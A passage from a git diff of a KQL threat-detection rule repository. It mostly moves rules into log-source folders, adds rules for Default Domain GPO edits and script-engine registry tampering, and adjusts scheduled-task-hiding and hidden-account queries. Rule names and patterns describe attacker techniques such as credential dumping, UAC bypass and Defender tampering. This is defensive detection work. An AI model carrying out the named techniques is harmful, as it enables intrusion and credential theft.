Movement/windows_admin_share_mount_via_net_exe.kql b/KQL/rules/windows/process_creation/windows_admin_share_mount_via_net_exe.kql similarity index 100% rename from KQL/rules/Lateral Movement/windows_admin_share_mount_via_net_exe.kql rename to KQL/rules/windows/process_creation/windows_admin_share_mount_via_net_exe.kql diff --git a/KQL/rules/Impact/windows_backup_deleted_via_wbadmin_exe.kql b/KQL/rules/windows/process_creation/windows_backup_deleted_via_wbadmin_exe.kql similarity index 100% rename from KQL/rules/Impact/windows_backup_deleted_via_wbadmin_exe.kql rename to KQL/rules/windows/process_creation/windows_backup_deleted_via_wbadmin_exe.kql diff --git a/KQL/rules/Credential Access/windows_credential_manager_access_via_vaultcmd.kql b/KQL/rules/windows/process_creation/windows_credential_manager_access_via_vaultcmd.kql similarity index 100% rename from KQL/rules/Credential Access/windows_credential_manager_access_via_vaultcmd.kql rename to KQL/rules/windows/process_creation/windows_credential_manager_access_via_vaultcmd.kql diff --git a/KQL/rules/windows/process_creation/windows_default_domain_gpo_modification_via_gpme.kql b/KQL/rules/windows/process_creation/windows_default_domain_gpo_modification_via_gpme.kql new file mode 100644 index 00000000..d45f7d5a --- /dev/null +++ b/KQL/rules/windows/process_creation/windows_default_domain_gpo_modification_via_gpme.kql @@ -0,0 +1,13 @@ +// Title: Windows Default Domain GPO Modification via GPME +// Author: TropChaud +// Date: 2025-11-22 +// Level: medium +// Description: Detects the use of the Group Policy Management Editor (GPME) to modify Default Domain or Default Domain Controllers Group Policy Objects (GPOs). +// Adversaries may leverage GPME to make stealthy changes in these default GPOs to deploy malicious GPOs configurations across the domain without raising suspicion. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1484.001 +// False Positives: +// - Legitimate use of GPME to modify GPOs + +DeviceProcessEvents +| where (ProcessCommandLine contains "31B2F340-016D-11D2-945F-00C04FB984F9" or ProcessCommandLine contains "6AC1786C-016F-11D2-945F-00C04FB984F9") and (ProcessCommandLine contains "gpme.msc" and ProcessCommandLine contains "gpobject:") and (FolderPath endswith "\\mmc.exe" or ProcessVersionInfoOriginalFileName =~ "MMC.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/windows_defender_context_menu_removed.kql b/KQL/rules/windows/process_creation/windows_defender_context_menu_removed.kql similarity index 100% rename from KQL/rules/Defense Evasion/windows_defender_context_menu_removed.kql rename to KQL/rules/windows/process_creation/windows_defender_context_menu_removed.kql diff --git a/KQL/rules/Defense Evasion/windows_defender_definition_files_removed.kql b/KQL/rules/windows/process_creation/windows_defender_definition_files_removed.kql similarity index 100% rename from KQL/rules/Defense Evasion/windows_defender_definition_files_removed.kql rename to KQL/rules/windows/process_creation/windows_defender_definition_files_removed.kql diff --git a/KQL/rules/Defense Evasion/windows_firewall_disabled_via_powershell.kql b/KQL/rules/windows/process_creation/windows_firewall_disabled_via_powershell.kql similarity index 100% rename from KQL/rules/Defense Evasion/windows_firewall_disabled_via_powershell.kql rename to KQL/rules/windows/process_creation/windows_firewall_disabled_via_powershell.kql diff --git a/KQL/rules/Execution/windows_hotfix_updates_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/windows_hotfix_updates_reconnaissance_via_wmic_exe.kql similarity index 100% rename from KQL/rules/Execution/windows_hotfix_updates_reconnaissance_via_wmic_exe.kql rename to KQL/rules/windows/process_creation/windows_hotfix_updates_reconnaissance_via_wmic_exe.kql diff --git a/KQL/rules/Lateral Movement/windows_internet_hosted_webdav_share_mount_via_net_exe.kql b/KQL/rules/windows/process_creation/windows_internet_hosted_webdav_share_mount_via_net_exe.kql similarity index 100% rename from KQL/rules/Lateral Movement/windows_internet_hosted_webdav_share_mount_via_net_exe.kql rename to KQL/rules/windows/process_creation/windows_internet_hosted_webdav_share_mount_via_net_exe.kql diff --git a/KQL/rules/Defense Evasion/windows_kernel_debugger_execution.kql b/KQL/rules/windows/process_creation/windows_kernel_debugger_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/windows_kernel_debugger_execution.kql rename to KQL/rules/windows/process_creation/windows_kernel_debugger_execution.kql diff --git a/KQL/rules/Defense Evasion/windows_processes_suspicious_parent_directory.kql b/KQL/rules/windows/process_creation/windows_processes_suspicious_parent_directory.kql similarity index 100% rename from KQL/rules/Defense Evasion/windows_processes_suspicious_parent_directory.kql rename to KQL/rules/windows/process_creation/windows_processes_suspicious_parent_directory.kql diff --git a/KQL/rules/Collection/windows_recall_feature_enabled_via_reg_exe.kql b/KQL/rules/windows/process_creation/windows_recall_feature_enabled_via_reg_exe.kql similarity index 100% rename from KQL/rules/Collection/windows_recall_feature_enabled_via_reg_exe.kql rename to KQL/rules/windows/process_creation/windows_recall_feature_enabled_via_reg_exe.kql diff --git a/KQL/rules/Impact/windows_recovery_environment_disabled_via_reagentc.kql b/KQL/rules/windows/process_creation/windows_recovery_environment_disabled_via_reagentc.kql similarity index 100% rename from KQL/rules/Impact/windows_recovery_environment_disabled_via_reagentc.kql rename to KQL/rules/windows/process_creation/windows_recovery_environment_disabled_via_reagentc.kql diff --git a/KQL/rules/Lateral Movement/windows_share_mount_via_net_exe.kql b/KQL/rules/windows/process_creation/windows_share_mount_via_net_exe.kql similarity index 100% rename from KQL/rules/Lateral Movement/windows_share_mount_via_net_exe.kql rename to KQL/rules/windows/process_creation/windows_share_mount_via_net_exe.kql diff --git a/KQL/rules/Collection/winrar_compressing_dump_files.kql b/KQL/rules/windows/process_creation/winrar_compressing_dump_files.kql similarity index 100% rename from KQL/rules/Collection/winrar_compressing_dump_files.kql rename to KQL/rules/windows/process_creation/winrar_compressing_dump_files.kql diff --git a/KQL/rules/Collection/winrar_execution_in_non_standard_folder.kql b/KQL/rules/windows/process_creation/winrar_execution_in_non_standard_folder.kql similarity index 100% rename from KQL/rules/Collection/winrar_execution_in_non_standard_folder.kql rename to KQL/rules/windows/process_creation/winrar_execution_in_non_standard_folder.kql diff --git a/KQL/rules/Lateral Movement/winrs_local_command_execution.kql b/KQL/rules/windows/process_creation/winrs_local_command_execution.kql similarity index 100% rename from KQL/rules/Lateral Movement/winrs_local_command_execution.kql rename to KQL/rules/windows/process_creation/winrs_local_command_execution.kql diff --git a/KQL/rules/Defense Evasion/wlrmdr_exe_uncommon_argument_or_child_process.kql b/KQL/rules/windows/process_creation/wlrmdr_exe_uncommon_argument_or_child_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/wlrmdr_exe_uncommon_argument_or_child_process.kql rename to KQL/rules/windows/process_creation/wlrmdr_exe_uncommon_argument_or_child_process.kql diff --git a/KQL/rules/Privilege Escalation/wmi_backdoor_exchange_transport_agent.kql b/KQL/rules/windows/process_creation/wmi_backdoor_exchange_transport_agent.kql similarity index 100% rename from KQL/rules/Privilege Escalation/wmi_backdoor_exchange_transport_agent.kql rename to KQL/rules/windows/process_creation/wmi_backdoor_exchange_transport_agent.kql diff --git a/KQL/rules/Persistence/wmi_persistence_script_event_consumer.kql b/KQL/rules/windows/process_creation/wmi_persistence_script_event_consumer.kql similarity index 100% rename from KQL/rules/Persistence/wmi_persistence_script_event_consumer.kql rename to KQL/rules/windows/process_creation/wmi_persistence_script_event_consumer.kql diff --git a/KQL/rules/Execution/wmic_remote_command_execution.kql b/KQL/rules/windows/process_creation/wmic_remote_command_execution.kql similarity index 100% rename from KQL/rules/Execution/wmic_remote_command_execution.kql rename to KQL/rules/windows/process_creation/wmic_remote_command_execution.kql diff --git a/KQL/rules/Execution/wmiprvse_spawned_a_process.kql b/KQL/rules/windows/process_creation/wmiprvse_spawned_a_process.kql similarity index 100% rename from KQL/rules/Execution/wmiprvse_spawned_a_process.kql rename to KQL/rules/windows/process_creation/wmiprvse_spawned_a_process.kql diff --git a/KQL/rules/Defense Evasion/write_protect_for_storage_disabled.kql b/KQL/rules/windows/process_creation/write_protect_for_storage_disabled.kql similarity index 100% rename from KQL/rules/Defense Evasion/write_protect_for_storage_disabled.kql rename to KQL/rules/windows/process_creation/write_protect_for_storage_disabled.kql diff --git a/KQL/rules/Defense Evasion/writing_of_malicious_files_to_the_fonts_folder.kql b/KQL/rules/windows/process_creation/writing_of_malicious_files_to_the_fonts_folder.kql similarity index 100% rename from KQL/rules/Defense Evasion/writing_of_malicious_files_to_the_fonts_folder.kql rename to KQL/rules/windows/process_creation/writing_of_malicious_files_to_the_fonts_folder.kql diff --git a/KQL/rules/Execution/wscript_shell_run_in_commandline.kql b/KQL/rules/windows/process_creation/wscript_shell_run_in_commandline.kql similarity index 100% rename from KQL/rules/Execution/wscript_shell_run_in_commandline.kql rename to KQL/rules/windows/process_creation/wscript_shell_run_in_commandline.kql diff --git a/KQL/rules/Execution/wsl_child_process_anomaly.kql b/KQL/rules/windows/process_creation/wsl_child_process_anomaly.kql similarity index 100% rename from KQL/rules/Execution/wsl_child_process_anomaly.kql rename to KQL/rules/windows/process_creation/wsl_child_process_anomaly.kql diff --git a/KQL/rules/Defense Evasion/wsl_kali_linux_usage.kql b/KQL/rules/windows/process_creation/wsl_kali_linux_usage.kql similarity index 100% rename from KQL/rules/Defense Evasion/wsl_kali_linux_usage.kql rename to KQL/rules/windows/process_creation/wsl_kali_linux_usage.kql diff --git a/KQL/rules/Execution/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql b/KQL/rules/windows/process_creation/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql similarity index 100% rename from KQL/rules/Execution/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql rename to KQL/rules/windows/process_creation/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql diff --git a/KQL/rules/Defense Evasion/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql b/KQL/rules/windows/process_creation/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql rename to KQL/rules/windows/process_creation/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql diff --git a/KQL/rules/Defense Evasion/xsl_script_execution_via_wmic_exe.kql b/KQL/rules/windows/process_creation/xsl_script_execution_via_wmic_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/xsl_script_execution_via_wmic_exe.kql rename to KQL/rules/windows/process_creation/xsl_script_execution_via_wmic_exe.kql diff --git a/KQL/rules/Privilege Escalation/xwizard_exe_execution_from_non_default_location.kql b/KQL/rules/windows/process_creation/xwizard_exe_execution_from_non_default_location.kql similarity index 100% rename from KQL/rules/Privilege Escalation/xwizard_exe_execution_from_non_default_location.kql rename to KQL/rules/windows/process_creation/xwizard_exe_execution_from_non_default_location.kql diff --git a/KQL/rules/Persistence/potential_persistence_via_disk_cleanup_handler_registry.kql b/KQL/rules/windows/registry/registry_add/potential_persistence_via_disk_cleanup_handler_registry.kql similarity index 100% rename from KQL/rules/Persistence/potential_persistence_via_disk_cleanup_handler_registry.kql rename to KQL/rules/windows/registry/registry_add/potential_persistence_via_disk_cleanup_handler_registry.kql diff --git a/KQL/rules/Defense Evasion/delete_defender_scan_shellex_context_menu_registry_key.kql b/KQL/rules/windows/registry/registry_delete/delete_defender_scan_shellex_context_menu_registry_key.kql similarity index 100% rename from KQL/rules/Defense Evasion/delete_defender_scan_shellex_context_menu_registry_key.kql rename to KQL/rules/windows/registry/registry_delete/delete_defender_scan_shellex_context_menu_registry_key.kql diff --git a/KQL/rules/Defense Evasion/folder_removed_from_exploit_guard_protectedfolders_list_registry.kql b/KQL/rules/windows/registry/registry_delete/folder_removed_from_exploit_guard_protectedfolders_list_registry.kql similarity index 100% rename from KQL/rules/Defense Evasion/folder_removed_from_exploit_guard_protectedfolders_list_registry.kql rename to KQL/rules/windows/registry/registry_delete/folder_removed_from_exploit_guard_protectedfolders_list_registry.kql diff --git a/KQL/rules/Defense Evasion/removal_of_amsi_provider_registry_keys.kql b/KQL/rules/windows/registry/registry_delete/removal_of_amsi_provider_registry_keys.kql similarity index 100% rename from KQL/rules/Defense Evasion/removal_of_amsi_provider_registry_keys.kql rename to KQL/rules/windows/registry/registry_delete/removal_of_amsi_provider_registry_keys.kql diff --git a/KQL/rules/Defense Evasion/removal_of_index_value_to_hide_schedule_task_registry.kql b/KQL/rules/windows/registry/registry_delete/removal_of_index_value_to_hide_schedule_task_registry.kql similarity index 67% rename from KQL/rules/Defense Evasion/removal_of_index_value_to_hide_schedule_task_registry.kql rename to KQL/rules/windows/registry/registry_delete/removal_of_index_value_to_hide_schedule_task_registry.kql index 41f0ea4a..01d28725 100644 --- a/KQL/rules/Defense Evasion/removal_of_index_value_to_hide_schedule_task_registry.kql +++ b/KQL/rules/windows/registry/registry_delete/removal_of_index_value_to_hide_schedule_task_registry.kql @@ -7,4 +7,4 @@ // Tags: attack.defense-evasion, attack.t1562 DeviceRegistryEvents -| where (ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*" and RegistryKey contains "Index") \ No newline at end of file +| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*" and RegistryKey contains "Index" \ No newline at end of file diff --git a/KQL/rules/Persistence/removal_of_potential_com_hijacking_registry_keys.kql b/KQL/rules/windows/registry/registry_delete/removal_of_potential_com_hijacking_registry_keys.kql similarity index 100% rename from KQL/rules/Persistence/removal_of_potential_com_hijacking_registry_keys.kql rename to KQL/rules/windows/registry/registry_delete/removal_of_potential_com_hijacking_registry_keys.kql diff --git a/KQL/rules/Defense Evasion/removal_of_sd_value_to_hide_schedule_task_registry.kql b/KQL/rules/windows/registry/registry_delete/removal_of_sd_value_to_hide_schedule_task_registry.kql similarity index 64% rename from KQL/rules/Defense Evasion/removal_of_sd_value_to_hide_schedule_task_registry.kql rename to KQL/rules/windows/registry/registry_delete/removal_of_sd_value_to_hide_schedule_task_registry.kql index de6ae2a0..6896874e 100644 --- a/KQL/rules/Defense Evasion/removal_of_sd_value_to_hide_schedule_task_registry.kql +++ b/KQL/rules/windows/registry/registry_delete/removal_of_sd_value_to_hide_schedule_task_registry.kql @@ -7,4 +7,4 @@ // Tags: attack.defense-evasion, attack.t1562 DeviceRegistryEvents -| where (ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*" and RegistryKey contains "SD") \ No newline at end of file +| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*" and RegistryKey contains "SD" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/runmru_registry_key_deletion_registry.kql b/KQL/rules/windows/registry/registry_delete/runmru_registry_key_deletion_registry.kql similarity index 100% rename from KQL/rules/Defense Evasion/runmru_registry_key_deletion_registry.kql rename to KQL/rules/windows/registry/registry_delete/runmru_registry_key_deletion_registry.kql diff --git a/KQL/rules/Persistence/terminal_server_client_connection_history_cleared_registry.kql b/KQL/rules/windows/registry/registry_delete/terminal_server_client_connection_history_cleared_registry.kql similarity index 100% rename from KQL/rules/Persistence/terminal_server_client_connection_history_cleared_registry.kql rename to KQL/rules/windows/registry/registry_delete/terminal_server_client_connection_history_cleared_registry.kql diff --git a/KQL/rules/Collection/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql b/KQL/rules/windows/registry/registry_delete/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql similarity index 100% rename from KQL/rules/Collection/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql rename to KQL/rules/windows/registry/registry_delete/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql diff --git a/KQL/rules/Privilege Escalation/atbroker_registry_change.kql b/KQL/rules/windows/registry/registry_event/atbroker_registry_change.kql similarity index 100% rename from KQL/rules/Privilege Escalation/atbroker_registry_change.kql rename to KQL/rules/windows/registry/registry_event/atbroker_registry_change.kql diff --git a/KQL/rules/Defense Evasion/cmstp_execution_registry_event.kql b/KQL/rules/windows/registry/registry_event/cmstp_execution_registry_event.kql similarity index 100% rename from KQL/rules/Defense Evasion/cmstp_execution_registry_event.kql rename to KQL/rules/windows/registry/registry_event/cmstp_execution_registry_event.kql diff --git a/KQL/rules/Persistence/creation_of_a_local_hidden_user_account_by_registry.kql b/KQL/rules/windows/registry/registry_event/creation_of_a_local_hidden_user_account_by_registry.kql similarity index 91% rename from KQL/rules/Persistence/creation_of_a_local_hidden_user_account_by_registry.kql rename to KQL/rules/windows/registry/registry_event/creation_of_a_local_hidden_user_account_by_registry.kql index a2864eb6..5911f687 100644 --- a/KQL/rules/Persistence/creation_of_a_local_hidden_user_account_by_registry.kql +++ b/KQL/rules/windows/registry/registry_event/creation_of_a_local_hidden_user_account_by_registry.kql @@ -7,4 +7,4 @@ // Tags: attack.persistence, attack.t1136.001 DeviceRegistryEvents -| where InitiatingProcessFolderPath endswith "\\lsass.exe" and RegistryKey endswith "\\SAM\\SAM\\Domains\\Account\\Users\\Names*" and RegistryKey endswith "$" \ No newline at end of file +| where InitiatingProcessFolderPath endswith "\\lsass.exe" and RegistryKey endswith "\\SAM\\SAM\\Domains\\Account\\Users\\Names*" and RegistryKey endswith "$\\(Default)" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/dll_load_via_lsass.kql b/KQL/rules/windows/registry/registry_event/dll_load_via_lsass.kql similarity index 100% rename from KQL/rules/Privilege Escalation/dll_load_via_lsass.kql rename to KQL/rules/windows/registry/registry_event/dll_load_via_lsass.kql diff --git a/KQL/rules/Defense Evasion/enable_remote_connection_between_anonymous_computer_allowanonymouscallback.kql b/KQL/rules/windows/registry/registry_event/enable_remote_connection_between_anonymous_computer_allowanonymouscallback.kql similarity index 100% rename from KQL/rules/Defense Evasion/enable_remote_connection_between_anonymous_computer_allowanonymouscallback.kql rename to KQL/rules/windows/registry/registry_event/enable_remote_connection_between_anonymous_computer_allowanonymouscallback.kql diff --git a/KQL/rules/Credential Access/esentutl_volume_shadow_copy_service_keys.kql b/KQL/rules/windows/registry/registry_event/esentutl_volume_shadow_copy_service_keys.kql similarity index 100% rename from KQL/rules/Credential Access/esentutl_volume_shadow_copy_service_keys.kql rename to KQL/rules/windows/registry/registry_event/esentutl_volume_shadow_copy_service_keys.kql diff --git a/KQL/rules/Resource Development/hybridconnectionmanager_service_installation_registry.kql b/KQL/rules/windows/registry/registry_event/hybridconnectionmanager_service_installation_registry.kql similarity index 100% rename from KQL/rules/Resource Development/hybridconnectionmanager_service_installation_registry.kql rename to KQL/rules/windows/registry/registry_event/hybridconnectionmanager_service_installation_registry.kql diff --git a/KQL/rules/Privilege Escalation/narrator_s_feedback_hub_persistence.kql b/KQL/rules/windows/registry/registry_event/narrator_s_feedback_hub_persistence.kql similarity index 100% rename from KQL/rules/Privilege Escalation/narrator_s_feedback_hub_persistence.kql rename to KQL/rules/windows/registry/registry_event/narrator_s_feedback_hub_persistence.kql diff --git a/KQL/rules/Persistence/netntlm_downgrade_attack_registry.kql b/KQL/rules/windows/registry/registry_event/netntlm_downgrade_attack_registry.kql similarity index 100% rename from KQL/rules/Persistence/netntlm_downgrade_attack_registry.kql rename to KQL/rules/windows/registry/registry_event/netntlm_downgrade_attack_registry.kql diff --git a/KQL/rules/Lateral Movement/new_portproxy_registry_entry_added.kql b/KQL/rules/windows/registry/registry_event/new_portproxy_registry_entry_added.kql similarity index 100% rename from KQL/rules/Lateral Movement/new_portproxy_registry_entry_added.kql rename to KQL/rules/windows/registry/registry_event/new_portproxy_registry_entry_added.kql diff --git a/KQL/rules/Persistence/office_application_startup_office_test.kql b/KQL/rules/windows/registry/registry_event/office_application_startup_office_test.kql similarity index 100% rename from KQL/rules/Persistence/office_application_startup_office_test.kql rename to KQL/rules/windows/registry/registry_event/office_application_startup_office_test.kql diff --git a/KQL/rules/Persistence/path_to_screensaver_binary_modified.kql b/KQL/rules/windows/registry/registry_event/path_to_screensaver_binary_modified.kql similarity index 100% rename from KQL/rules/Persistence/path_to_screensaver_binary_modified.kql rename to KQL/rules/windows/registry/registry_event/path_to_screensaver_binary_modified.kql diff --git a/KQL/rules/Credential Access/potential_credential_dumping_via_lsass_silentprocessexit_technique.kql b/KQL/rules/windows/registry/registry_event/potential_credential_dumping_via_lsass_silentprocessexit_technique.kql similarity index 100% rename from KQL/rules/Credential Access/potential_credential_dumping_via_lsass_silentprocessexit_technique.kql rename to KQL/rules/windows/registry/registry_event/potential_credential_dumping_via_lsass_silentprocessexit_technique.kql diff --git a/KQL/rules/Persistence/potential_qakbot_registry_activity.kql b/KQL/rules/windows/registry/registry_event/potential_qakbot_registry_activity.kql similarity index 100% rename from KQL/rules/Persistence/potential_qakbot_registry_activity.kql rename to KQL/rules/windows/registry/registry_event/potential_qakbot_registry_activity.kql diff --git a/KQL/rules/Persistence/redmimicry_winnti_playbook_registry_manipulation.kql b/KQL/rules/windows/registry/registry_event/redmimicry_winnti_playbook_registry_manipulation.kql similarity index 100% rename from KQL/rules/Persistence/redmimicry_winnti_playbook_registry_manipulation.kql rename to KQL/rules/windows/registry/registry_event/redmimicry_winnti_playbook_registry_manipulation.kql diff --git a/KQL/rules/Defense Evasion/registry_entries_for_azorult_malware.kql b/KQL/rules/windows/registry/registry_event/registry_entries_for_azorult_malware.kql similarity index 100% rename from KQL/rules/Defense Evasion/registry_entries_for_azorult_malware.kql rename to KQL/rules/windows/registry/registry_event/registry_entries_for_azorult_malware.kql diff --git a/KQL/rules/windows/registry/registry_event/registry_tampering_by_potentially_suspicious_processes.kql b/KQL/rules/windows/registry/registry_event/registry_tampering_by_potentially_suspicious_processes.kql new file mode 100644 index 00000000..fb18677c --- /dev/null +++ b/KQL/rules/windows/registry/registry_event/registry_tampering_by_potentially_suspicious_processes.kql @@ -0,0 +1,14 @@ +// Title: Registry Tampering by Potentially Suspicious Processes +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-08-13 +// Level: medium +// Description: Detects suspicious registry modifications made by suspicious processes such as script engine processes such as WScript, or CScript etc. +// These processes are rarely used for legitimate registry modifications, and their activity may indicate an attempt to modify the registry +// without using standard tools like regedit.exe or reg.exe, potentially for evasion and persistence. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.execution, attack.t1112, attack.t1059.005 +// False Positives: +// - Some legitimate admin or install scripts may use these processes for registry modifications. + +DeviceRegistryEvents +| where InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" \ No newline at end of file diff --git a/KQL/rules/Persistence/run_once_task_configuration_in_registry.kql b/KQL/rules/windows/registry/registry_event/run_once_task_configuration_in_registry.kql similarity index 100% rename from KQL/rules/Persistence/run_once_task_configuration_in_registry.kql rename to KQL/rules/windows/registry/registry_event/run_once_task_configuration_in_registry.kql diff --git a/KQL/rules/Privilege Escalation/security_support_provider_ssp_added_to_lsa_configuration.kql b/KQL/rules/windows/registry/registry_event/security_support_provider_ssp_added_to_lsa_configuration.kql similarity index 100% rename from KQL/rules/Privilege Escalation/security_support_provider_ssp_added_to_lsa_configuration.kql rename to KQL/rules/windows/registry/registry_event/security_support_provider_ssp_added_to_lsa_configuration.kql diff --git a/KQL/rules/Persistence/shell_open_registry_keys_manipulation.kql b/KQL/rules/windows/registry/registry_event/shell_open_registry_keys_manipulation.kql similarity index 100% rename from KQL/rules/Persistence/shell_open_registry_keys_manipulation.kql rename to KQL/rules/windows/registry/registry_event/shell_open_registry_keys_manipulation.kql diff --git a/KQL/rules/Privilege Escalation/sticky_key_like_backdoor_usage_registry.kql b/KQL/rules/windows/registry/registry_event/sticky_key_like_backdoor_usage_registry.kql similarity index 100% rename from KQL/rules/Privilege Escalation/sticky_key_like_backdoor_usage_registry.kql rename to KQL/rules/windows/registry/registry_event/sticky_key_like_backdoor_usage_registry.kql diff --git a/KQL/rules/Collection/suspicious_camera_and_microphone_access.kql b/KQL/rules/windows/registry/registry_event/suspicious_camera_and_microphone_access.kql similarity index 100% rename from KQL/rules/Collection/suspicious_camera_and_microphone_access.kql rename to KQL/rules/windows/registry/registry_event/suspicious_camera_and_microphone_access.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_run_key_from_download.kql b/KQL/rules/windows/registry/registry_event/suspicious_run_key_from_download.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_run_key_from_download.kql rename to KQL/rules/windows/registry/registry_event/suspicious_run_key_from_download.kql diff --git a/KQL/rules/Defense Evasion/uac_bypass_via_wsreset.kql b/KQL/rules/windows/registry/registry_event/uac_bypass_via_wsreset.kql similarity index 100% rename from KQL/rules/Defense Evasion/uac_bypass_via_wsreset.kql rename to KQL/rules/windows/registry/registry_event/uac_bypass_via_wsreset.kql diff --git a/KQL/rules/Persistence/wdigest_credguard_registry_modification.kql b/KQL/rules/windows/registry/registry_event/wdigest_credguard_registry_modification.kql similarity index 100% rename from KQL/rules/Persistence/wdigest_credguard_registry_modification.kql rename to KQL/rules/windows/registry/registry_event/wdigest_credguard_registry_modification.kql diff --git a/KQL/rules/Credential Access/windows_credential_editor_registry.kql b/KQL/rules/windows/registry/registry_event/windows_credential_editor_registry.kql similarity index 100% rename from KQL/rules/Credential Access/windows_credential_editor_registry.kql rename to KQL/rules/windows/registry/registry_event/windows_credential_editor_registry.kql diff --git a/KQL/rules/Defense Evasion/windows_defender_threat_severity_default_action_modified.kql b/KQL/rules/windows/registry/registry_event/windows_defender_threat_severity_default_action_modified.kql similarity index 100% rename from KQL/rules/Defense Evasion/windows_defender_threat_severity_default_action_modified.kql rename to KQL/rules/windows/registry/registry_event/windows_defender_threat_severity_default_action_modified.kql diff --git a/KQL/rules/Initial Access/windows_registry_trust_record_modification.kql b/KQL/rules/windows/registry/registry_event/windows_registry_trust_record_modification.kql similarity index 100% rename from KQL/rules/Initial Access/windows_registry_trust_record_modification.kql rename to KQL/rules/windows/registry/registry_event/windows_registry_trust_record_modification.kql diff --git a/KQL/rules/Privilege Escalation/winekey_registry_modification.kql b/KQL/rules/windows/registry/registry_event/winekey_registry_modification.kql similarity index 100% rename from KQL/rules/Privilege Escalation/winekey_registry_modification.kql rename to KQL/rules/windows/registry/registry_event/winekey_registry_modification.kql diff --git a/KQL/rules/Persistence/activate_suppression_of_windows_security_center_notifications.kql b/KQL/rules/windows/registry/registry_set/activate_suppression_of_windows_security_center_notifications.kql similarity index 100% rename from KQL/rules/Persistence/activate_suppression_of_windows_security_center_notifications.kql rename to KQL/rules/windows/registry/registry_set/activate_suppression_of_windows_security_center_notifications.kql diff --git a/KQL/rules/Persistence/add_debugger_entry_to_aedebug_for_persistence.kql b/KQL/rules/windows/registry/registry_set/add_debugger_entry_to_aedebug_for_persistence.kql similarity index 100% rename from KQL/rules/Persistence/add_debugger_entry_to_aedebug_for_persistence.kql rename to KQL/rules/windows/registry/registry_set/add_debugger_entry_to_aedebug_for_persistence.kql diff --git a/KQL/rules/Persistence/add_debugger_entry_to_hangs_key_for_persistence.kql b/KQL/rules/windows/registry/registry_set/add_debugger_entry_to_hangs_key_for_persistence.kql similarity index 100% rename from KQL/rules/Persistence/add_debugger_entry_to_hangs_key_for_persistence.kql rename to KQL/rules/windows/registry/registry_set/add_debugger_entry_to_hangs_key_for_persistence.kql diff --git a/KQL/rules/Persistence/add_disallowrun_execution_to_registry.kql b/KQL/rules/windows/registry/registry_set/add_disallowrun_execution_to_registry.kql similarity index 100% rename from KQL/rules/Persistence/add_disallowrun_execution_to_registry.kql rename to KQL/rules/windows/registry/registry_set/add_disallowrun_execution_to_registry.kql diff --git a/KQL/rules/Privilege Escalation/add_port_monitor_persistence_in_registry.kql b/KQL/rules/windows/registry/registry_set/add_port_monitor_persistence_in_registry.kql similarity index 100% rename from KQL/rules/Privilege Escalation/add_port_monitor_persistence_in_registry.kql rename to KQL/rules/windows/registry/registry_set/add_port_monitor_persistence_in_registry.kql diff --git a/KQL/rules/Persistence/allow_rdp_remote_assistance_feature.kql b/KQL/rules/windows/registry/registry_set/allow_rdp_remote_assistance_feature.kql similarity index 100% rename from KQL/rules/Persistence/allow_rdp_remote_assistance_feature.kql rename to KQL/rules/windows/registry/registry_set/allow_rdp_remote_assistance_feature.kql diff --git a/KQL/rules/Defense Evasion/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql b/KQL/rules/windows/registry/registry_set/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql similarity index 100% rename from KQL/rules/Defense Evasion/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql rename to KQL/rules/windows/registry/registry_set/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql diff --git a/KQL/rules/Privilege Escalation/bypass_uac_using_delegateexecute.kql b/KQL/rules/windows/registry/registry_set/bypass_uac_using_delegateexecute.kql similarity index 100% rename from KQL/rules/Privilege Escalation/bypass_uac_using_delegateexecute.kql rename to KQL/rules/windows/registry/registry_set/bypass_uac_using_delegateexecute.kql diff --git a/KQL/rules/Privilege Escalation/bypass_uac_using_event_viewer.kql b/KQL/rules/windows/registry/registry_set/bypass_uac_using_event_viewer.kql similarity index 100% rename from KQL/rules/Privilege Escalation/bypass_uac_using_event_viewer.kql rename to KQL/rules/windows/registry/registry_set/bypass_uac_using_event_viewer.kql diff --git a/KQL/rules/Privilege Escalation/bypass_uac_using_silentcleanup_task.kql b/KQL/rules/windows/registry/registry_set/bypass_uac_using_silentcleanup_task.kql similarity index 100% rename from KQL/rules/Privilege Escalation/bypass_uac_using_silentcleanup_task.kql rename to KQL/rules/windows/registry/registry_set/bypass_uac_using_silentcleanup_task.kql diff --git a/KQL/rules/Persistence/change_the_fax_dll.kql 